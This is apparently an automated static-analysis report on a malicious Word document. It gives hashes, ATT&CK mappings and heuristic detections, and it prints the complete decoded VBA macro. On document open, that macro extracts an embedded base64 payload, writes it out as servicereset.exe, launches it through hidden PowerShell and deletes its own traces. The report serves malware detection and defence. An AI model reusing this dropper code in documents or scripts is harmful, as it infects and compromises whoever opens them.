Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 119c64a8b35bd626…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 840.5 KB
Created: 2017-08-21 21:16:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 02306d629ca4092551081c4ebcbbd9b4
SHA-1: cc40a3bb20b17bb13e8b5888634ea9371d69ec01
SHA-256: 119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc
Risk Score: 498

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample triggers the critical OLE_VBA_SHELL and OLE_VBA_PS heuristics, indicating that the VBA macro attempts to execute PowerShell commands. The Document_Open macro builds a path to 'AppData\Pr.bin' and uses 'Shell' to write the string 'powershell' into that file, then waits briefly. It reads the file back and uses its contents as the command with which the later PowerShell stages are launched. The macro also copies the current document to 'AppData\Tmp.doc' and processes that copy further, suggesting downloader or dropper functionality.

Heuristics (14)

  • ClamAV: Doc.Dropper.Agent-6343826-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6343826-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 7 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched line in script
    OoHHHD = Environ$("AppData") & "\Pr.bin"
    Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • PowerShell reference in VBA (critical, OLE_VBA_PS)
    Matched line in script
    OoHHHD = Environ$("AppData") & "\Pr.bin"
    Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    OoHHHD = Environ$("AppData") & "\Pr.bin"
    Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script
    Dim hBLtBWN, eBUH
    Set hBLtBWN = CreateObject("ADODB.Stream")
    hBLtBWN.Charset = "utf-8"
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched line in script
    Option Explicit
    Private Sub Document_Open()
    Dim OoHHHD As String
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Matched line in script
    Dim OoHHHD As String
    OoHHHD = Environ$("AppData") & "\Pr.bin"
    Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • Heap-spray pattern detected (high, SC_HEAP_SPRAY)
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    000D16E9  41                inc ecx
    000D16EA  41                inc ecx
    000D16EB  41                inc ecx
    000D16EC  41                inc ecx
    000D16ED  41                inc ecx
    000D16EE  41                inc ecx
    000D16EF  41                inc ecx
    000D16F0  41                inc ecx
    000D16F1  41                inc ecx
    000D16F2  41                inc ecx
    000D16F3  41                inc ecx
    000D16F4  41                inc ecx
    000D16F5  41                inc ecx
    000D16F6  41                inc ecx
    000D16F7  41                inc ecx
    000D16F8  41                inc ecx
    000D16F9  41                inc ecx
    000D16FA  41                inc ecx
    000D16FB  41                inc ecx
    000D16FC  41                inc ecx
    000D16FD  41                inc ecx
    000D16FE  41                inc ecx
    000D16FF  41                inc ecx
    000D1700  41                inc ecx
    000D1701  41                inc ecx
    000D1702  41                inc ecx
    000D1703  41                inc ecx
    000D1704  41                inc ecx
    000D1705  41                inc ecx
    000D1706  41                inc ecx
    000D1707  41                inc ecx
    000D1708  41                inc ecx
    000D1709  41                inc ecx
    000D170A  41                inc ecx
    000D170B  41                inc ecx
    000D170C  41                inc ecx
    000D170D  41                inc ecx
    000D170E  41                inc ecx
    000D170F  41                inc ecx
    000D1710  41                inc ecx
    000D1711  41                inc ecx
    000D1712  41                inc ecx
    000D1713  41                inc ecx
    000D1714  41                inc ecx
    000D1715  41                inc ecx
    000D1716  41                inc ecx
    000D1717  41                inc ecx
    000D1718  41                inc ecx
    000D1719  41                inc ecx
    000D171A  41                inc ecx
    000D171B  41                inc ecx
    000D171C  41                inc ecx
    000D171D  41                inc ecx
    000D171E  41                inc ecx
    000D171F  41                inc ecx
    000D1720  41                inc ecx
    000D1721  41                inc ecx
    000D1722  41                inc ecx
    000D1723  41                inc ecx
    000D1724  41                inc ecx
    000D1725  41                inc ecx
    000D1726  41                inc ecx
    000D1727  41                inc ecx
    000D1728  41                inc ecx
    000D1729  41                inc ecx
    000D172A  41                inc ecx
    000D172B  41                inc ecx
    000D172C  41                inc ecx
    000D172D  41                inc ecx
    000D172E  41                inc ecx
    000D172F  41                inc ecx
    000D1730  41                inc ecx
    000D1731  41                inc ecx
    000D1732  41                inc ecx
    000D1733  41                inc ecx
    000D1734  41                inc ecx
    000D1735  41                inc ecx
    000D1736  41                inc ecx
    000D1737  41                inc ecx
    000D1738  41                inc ecx
    000D1739  41                inc ecx
    000D173A  41                inc ecx
    000D173B  41                inc ecx
    000D173C  41                inc ecx
    000D173D  41                inc ecx
    000D173E  41                inc ecx
    000D173F  41                inc ecx
    000D1740  41                inc ecx
    000D1741  41                inc ecx
    000D1742  41                inc ecx
    000D1743  41                inc ecx
    000D1744  41                inc ecx
    000D1745  41                inc ecx
    000D1746  41                inc ecx
    000D1747  41                inc ecx
    000D1748  41                inc ecx
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
  • Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED)
    Long run of 0x41 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00088227  41                inc ecx
    00088228  41                inc ecx
    00088229  41                inc ecx
    0008822A  41                inc ecx
    0008822B  41                inc ecx
    0008822C  41                inc ecx
    0008822D  41                inc ecx
    0008822E  41                inc ecx
    0008822F  41                inc ecx
    00088230  41                inc ecx
    00088231  41                inc ecx
    00088232  41                inc ecx
    00088233  41                inc ecx
    00088234  41                inc ecx
    00088235  41                inc ecx
    00088236  41                inc ecx
    00088237  41                inc ecx
    00088238  41                inc ecx
    00088239  41                inc ecx
    0008823A  41                inc ecx
    0008823B  41                inc ecx
    0008823C  41                inc ecx
    0008823D  41                inc ecx
    0008823E  41                inc ecx
    0008823F  41                inc ecx
    00088240  41                inc ecx
    00088241  41                inc ecx
    00088242  41                inc ecx
    00088243  41                inc ecx
    00088244  41                inc ecx
    00088245  41                inc ecx
    00088246  41                inc ecx
    00088247  41                inc ecx
    00088248  41                inc ecx
    00088249  41                inc ecx
    0008824A  41                inc ecx
    0008824B  41                inc ecx
    0008824C  41                inc ecx
    0008824D  41                inc ecx
    0008824E  41                inc ecx
    0008824F  41                inc ecx
    00088250  41                inc ecx
    00088251  41                inc ecx
    00088252  41                inc ecx
    00088253  41                inc ecx
    00088254  41                inc ecx
    00088255  41                inc ecx
    00088256  6741              inc ecx
    00088258  41                inc ecx
    00088259  41                inc ecx
    0008825A  41                inc ecx
    0008825B  41                inc ecx
    0008825C  3466              xor al, 0x66
    0008825E  7567              jne 0x882c7
    00088260  3441              xor al, 0x41
    00088262  7441              je 0x882a5
    00088264  6e                outsb dx, byte ptr [esi]
    00088265  4e                dec esi
    00088266  49                dec ecx
    00088267  626742            bound esp, qword ptr [edi + 0x42]
    0008826A  54                push esp
    0008826B  4d                dec ebp
    0008826C  306856            xor byte ptr [eax + 0x56], ch
    0008826F  47                inc edi
    00088270  6870637942        push 0x42796370
    00088275  7763              ja 0x882da
    00088277  6d                insd dword ptr es:[edi], dx
    00088278  396e63            cmp dword ptr [esi + 0x63], ebp
    0008827B  6d                insd dword ptr es:[edi], dx
    0008827C  46                inc esi
    0008827D  7449              je 0x882c8
    0008827F  47                inc edi
    00088280  4e                dec esi
    00088281  68626d3576        push 0x76356d62
    00088286  64                .byte 0x64
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2839 bytes
SHA-256: 1dd296c7d968d776126e27e2ba61cfa7380caa14fe3388f3ead2ae6c936acfd3
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Open()
Dim OoHHHD As String
OoHHHD = Environ$("AppData") & "\Pr.bin"
Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide

Dim JnQTSPz
JnQTSPz = DateAdd("s", 2, Now())
Do Until (Now() > JnQTSPz)
Loop

Dim hBLtBWN, eBUH
Set hBLtBWN = CreateObject("ADODB.Stream")
hBLtBWN.Charset = "utf-8"
hBLtBWN.Open
hBLtBWN.LoadFromFile (OoHHHD)
eBUH = hBLtBWN.ReadText()
eBUH = Replace(eBUH, vbCrLf, vbNullString)


Dim COOgvrT As String
COOgvrT = ThisDocument.FullName
Dim ANYuGEOsm As String
ANYuGEOsm = Environ$("AppData") & "\Tmp.doc"
Dim xMjIQQ As String
xMjIQQ = "Copy-Item " & Chr(39) & "%FilePath%" & Chr(39) & " " & Chr(39) & "%DestFolder%" & Chr(39)
xMjIQQ = Replace(xMjIQQ, "%FilePath%", COOgvrT)
xMjIQQ = Replace(xMjIQQ, "%DestFolder%", ANYuGEOsm)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & xMjIQQ, vbHide


Dim JnQTSPzC
JnQTSPzC = DateAdd("s", 7, Now())
Do Until (Now() > JnQTSPzC)
Loop

Dim UbdhzXR, RbnuKl
Set UbdhzXR = CreateObject("ADODB.Stream")
UbdhzXR.Charset = "utf-8"
UbdhzXR.Open
UbdhzXR.LoadFromFile (ANYuGEOsm)
RbnuKl = UbdhzXR.ReadText()

Dim OaxIUyC As String
Dim norhEFQN() As String
norhEFQN = Split(RbnuKl, Chr(35) & Chr(35) & Chr(35) & Chr(36) & Chr(36) & Chr(36))
Dim MyBase As String
MyBase = norhEFQN(1)

Dim lnBvO As String
lnBvO = Environ$("AppData") & "\Base.txt"

Dim JBvTxY
Dim f
Set JBvTxY = CreateObject("Scripting.FileSystemObject")
Set f = JBvTxY.OpenTextFile(lnBvO, 2, True)
f.write MyBase
f.Close

Dim GBFiI As String
GBFiI = Environ$("PUBLIC") & "\Libraries\servicereset.exe"
Dim DAOvSAGaX As String
DAOvSAGaX = "$DATA = [System.Convert]::FromBase64String([IO.File]::ReadAllText('%Base%'));[io.file]::WriteAllBytes('GBFiI',$DATA);Start-Process 'GBFiI'"
DAOvSAGaX = Replace(DAOvSAGaX, "%Base%", lnBvO)
DAOvSAGaX = Replace(DAOvSAGaX, "GBFiI", GBFiI)

Shell Environ$("COMSPEC") & " /c " & eBUH & " " & DAOvSAGaX, vbHide

Dim bNJTCGU As String
bNJTCGU = "Remove-Item " & Chr(39) & "%File%" & Chr(39)
bNJTCGU = Replace(bNJTCGU, "%File%", ANYuGEOsm)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & bNJTCGU, vbHide

bNJTCGU = "Remove-Item " & Chr(39) & "%File%" & Chr(39)
bNJTCGU = Replace(bNJTCGU, "%File%", lnBvO)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & bNJTCGU, vbHide

bNJTCGU = "Remove-Item " & Chr(39) & "%File%" & Chr(39)
bNJTCGU = Replace(bNJTCGU, "%File%", OoHHHD)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & bNJTCGU, vbHide
End Sub